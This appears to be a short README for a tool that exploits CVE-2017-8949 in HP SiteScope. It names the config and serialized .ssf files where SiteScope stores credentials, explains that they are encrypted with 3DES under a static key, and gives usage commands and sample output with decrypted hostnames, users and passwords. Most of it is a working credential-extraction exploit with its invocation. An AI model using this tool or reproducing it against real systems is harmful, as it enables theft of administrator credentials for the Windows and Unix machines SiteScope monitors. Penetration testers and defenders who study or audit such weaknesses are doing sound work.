HP SiteScope keeps password information in two files:
- C:\SiteScope\groups\users.config is a text config file with credentials to HP SiteScope
- C:\SiteScope\persistency\random_file_name.ssf is a java serialized object file with credentials to Widnows and *nix machines
The tool uses CVE-2017-8949 vulnerability, which allows to decrypt any HP SiteScope's password using 3DES algorithm and a static key.
$ npm install
$ ./decryptor.js --help
$ ./decryptor.js -p '(sisp)va1xBRC68d2p/zkd3YVpPg=='
$ ./decryptor.js --ssf-file ./../12345678.ssf | column -t -s ';'
HOST: OS: RHESLinux USER: pentest PASSWORD: pentest
HOST: \\ OS: NT USER: PENTEST\Administrator PASSWORD: pentest